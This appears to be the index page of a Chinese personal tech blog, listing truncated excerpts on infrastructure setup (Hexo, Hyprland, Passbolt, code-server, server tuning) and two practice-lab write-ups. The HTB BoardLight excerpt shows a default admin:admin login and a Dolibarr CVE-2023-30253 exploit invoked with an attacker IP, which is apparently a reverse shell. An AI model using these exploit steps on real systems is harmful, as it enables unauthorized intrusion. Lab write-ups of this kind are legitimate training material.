Hexo博客站点搭建记录
最近,我的观念发生了一些改变。回顾过去一两年,我在折腾各种环境上花费了太多时间和精力,这让我渐渐偏离了最初的技术研究方向,再者很多基础设施我并没有从一开始用心认证去做,一时兴起占据多数。现在我觉得应该收收心思,少些花里胡哨,多点脚踏实地,决定将个人基础设施踏踏实实的用心做好。我觉得重构博客是一个不错的开始。 环境准备在搭建博客之前最好选择一个适合自己的搭载的博客环境,最开始我是准备在物理机上构建,但是考虑到后续可能会有很多文章内容包含会被杀软查杀的命令代码,所以我使用Hyper-V安装了一台搭载Debian 12操作系统的虚拟机用来搭载我的博客站点。VMware最近一两年在使用过程中总是出现一些莫名其妙的小问题,但是让我个人感觉非常不爽,我更喜欢Hyper-V,虽然两者对于个人用户来说没啥大区别。VMware与Hyper-V其实都不方便复制粘贴的,所以可以开启服务器的SSH服务,便于复制粘贴: 1systemctl start sshd.service Windows 10以后的操作系统命令行已经自带ssh工具了,打开物理机终端输入: 12ssh...
Hyprland桌面环境构建与美化
最近我尝试了一款名为 Hyprland 的 Linux 桌面环境,这个过程让我折腾了很久。由于对 Linux 底层原理不太了解,加上各种报错让我感到无力,我先后在 Debian、Kali、Parrot 和 Arch Linux 上尝试安装。比较麻烦是来源于它只支持 C++26,而目前 Kali 和 Parrot 只有 g++13,C++26 只有在 Debian 13 测试版和 Arch Linux 系列中可用。虽然尝试在 Debian 上从零构建,但总是因为一些未知原因报错,而 Arch Linux 则相对容易构建。然而,在日常工作和学习中,各种工具环境的报错让人头疼,尽管有文档支持。 在 Arch 使用一段时间后,我渐渐的喜欢上了它,但紧接着就遇到了问题,一些工具报错甚至没有错误日志,只显示白屏。但是我仍然不想换回 Windows,因为我选择的笔记本似乎真的是为程序员设计的,装 Windows 时会出现死机和音箱破音的问题,而在 Linux 下这些问题都没有。 尽管心灰意冷,我准备结束折腾之路,老老实实换回 Kali,但 Kali 安装其他软件时的依赖问题也让我头疼,尤其是...
Passbolt密码管理平台搭建
安全的同僚,尤其甲方的蓝队安全人员往往会碰到这样的问题,一堆安全设备的密码Passbolt是面向团队的开源密码管理。专为团队协作而打造,开源、自托管、以 API 为中心、注重隐私、开发者优先。 官方文档建议的配置是2H2GB的,我选择了Debian 12操作系统,纯净好用!本文是以docker为例搭建的,如果想系统安装建议最新最干净的系统进行安装,别整什么服务面板之类的,不然可能你web服务是哪个跑起来的都分不清。 环境准备使用docker安装会很方便,首先安装部署docker: 123456789sudo apt update sudo apt install apt-transport-https ca-certificates curl software-properties-common curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg echo...
Proving Grounds Vector Writeup
Recon:1nmap 192.168.201.119 -p- -Pn -n -sT --min-rate 2000 1nmap 192.168.201.119 -p21,80,135,139,445,2290,3389,5985 -sC -sV 12345678910PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd80/tcp open http Microsoft IIS httpd 10.0135/tcp open msrpc Microsoft Windows RPC~~139/tcp open netbios-ssn Microsoft Windows netbios-ssn~~~~445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 2012 microsoft-ds~~2290/tcp open http ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment
个人服务器使用优化
前段时间为了搭建Tailscale组网方案,又为了一些便利,在香港租用了一台云服务器,性价比还可以,4H8G、40GB固态硬盘、30Mbs带宽,但是我只在上边部署了Tailscale用作出口节点感觉好浪费。所以在想如何压榨一下服务器的性能负载。 基本环境部署首先是运维面板,我还是选择了宝塔国际版,因为这版没有广告: 1https://www.aapanel.com/ 建议就在以上地址找到的安装脚本进行安装,其他地方找到的哪怕是 bt.cn 上的都别用,有坑。使用aapanel可以很方便的编译安装nginx,我这里选择1.26稳定版本的nginx。 服务器优化网络核心优化编辑 /etc/sysctl.conf,添加以下参数 ,这可以满足我的日常VPN使用谷歌,docker镜像进行更新等等: 123456########################################## # 网络核心优化 ########################################## # 启用BBR加速,提升VPN、视频流性能 ...
Code-server
发现了一个极其方便的应用,这可要比在宝塔里编辑文件方便很多,发现自己最近在疯狂搞基础设施搭建: 1https://github.com/coder/code-server 使用安装命令: 1curl -fsSL https://code-server.dev/install.sh | sh 就安装好了,真简单,默认配置文件在以下位置: 1~/.config/code-server/config.yaml 配置文件示例: 1234567bind-addr: 0.0.0.0:8080 # Code Server 监听的地址和端口 auth: password # 认证方式,可以是 'password' 或 'none' password: yourpassword # 用于登录的密码 cert: false # 是否使用 HTTPS,默认为 false # cert: /path/to/cert.crt # 如果使用 HTTPS,指定证书路径 # cert-key:...
HTB BoardLight Writeup
Recon:1rustscan -a 10.10.11.11 --range 1-65535 1nmap 10.10.11.11 -p22,80 -sC -sV 80端口web服务并没有什么有趣的地方: 枚举Vhost: 1wfuzz -c -u http://board.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host:FUZZ.board.htb" --hh 15949 谷歌搜索Dolibarr 17.0.0会发现一个漏洞: 该漏洞需要用户名和密码,但是用户名和密码在尝试admin:admin便成功登录了进去: 使用以下POC: 1https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git 1python exploit.py http://crm.board.htb admin admin 10.10.16.7...